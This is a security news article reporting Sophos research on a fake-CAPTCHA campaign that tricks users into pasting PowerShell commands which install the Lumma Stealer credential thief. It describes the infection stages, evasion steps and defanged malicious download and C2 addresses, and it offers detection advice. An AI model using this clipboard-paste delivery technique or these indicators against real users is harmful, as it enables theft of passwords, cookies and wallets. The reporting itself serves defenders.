Ddos 
Sophos X-Ops has uncovered a cunning cybercrime campaign using fake CAPTCHA pages to trick users into running PowerShell commands—unknowingly launching the notorious Lumma Stealer malware.
“Lumma Stealer remains a significant threat as of this writing,” Sophos notes, “and the tactic of using fake CAPTCHA sites to lull victims into entering a malicious command… is an ugly twist on the situation.”
Lumma Stealer is a well-known Malware-as-a-Service (MaaS) offering sold via Telegram, originating from Russian-speaking developers. It targets sensitive data like browser passwords, cookies, cryptocurrency wallets, and session tokens.
The attack begins innocuously. Users are directed to a seemingly legitimate CAPTCHA site—like hxxps://camplytic[.]com/go/…—and are asked to verify they are human. Next, victims are guided to press Ctrl + V and Enter in the Windows Run dialog, unknowingly executing a base64 PowerShell payload.
“The PowerShell command… triggers a concealed JavaScript function that drops a PowerShell script onto the Clipboard and runs it in a hidden window.”
This script downloads additional code from: hxxps://fixedzip.oss-ap-southeast-5.aliyuncs.com/new-artist.txt.
It then proceeds to retrieve a ZIP archive containing the Lumma Stealer binary—ArtistSponsorship.exe—which drops multiple files and executes a heavily obfuscated AutoIt script.
The AutoIt script connects to C2 infrastructure at snail-r1ced[.]cyou, and begins its data theft operations. It targets Chrome login credentials, cookies, and user data. Sophos observed a 6.37MB file of stolen data exfiltrated to this C2 server.
“AutoIt3.exe is accessing login data and cookies used by the Chrome browser,” Sophos researchers documented.
A second delivery method mimics a PDF download. The file appears as Instruction_695-18014-012_Rev.PDF, but is actually a .lnk shortcut file executing an obfuscated PowerShell script that, again, fetches and loads further payloads using mshta.exe.
This malicious script unpacks AES-encrypted data, decodes it with CyberChef, and dynamically loads a PE file into memory. The PE’s static method aHdiNKuWlR downloads additional scripts and, ironically, even opens a real IRS PDF—a clever decoy to mask the breach.
Sophos’ deep dive revealed the final stage as a heavily obfuscated PowerShell script that dynamically resolves low-level Windows APIs like VirtualProtect and AmsiInitialize, further highlighting the advanced evasive techniques used by the malware authors.
Sophos recommends checking known Indicators of Compromise (IoCs), monitoring file and process activity, and reviewing browser history for fake CAPTCHA URLs. Detections may be aided by the use of EDR tools that correlate file creation, process behavior, and suspicious clipboard events.
“Educating users to mistrust CAPTCHAs, after so many years of convincing them to answer them, is a heavy lift,” the report cautions.
Related Posts:
- Lumma Stealer: Unpacking Its Evasive Tactics and Complex Infection Chains
- Are CAPTCHAs Dead? The Rise of AI-Powered Bots
- Cybercriminals Exploit CAPTCHA to Deliver Malware: Experts Issue Warning
- Fake CAPTCHA Phishing Campaign Impacts Over 1,150 Organizations
- Lumma Stealer MaaS: Clipboard Hijacking and LOLBins Used in Latest Campaign
Donate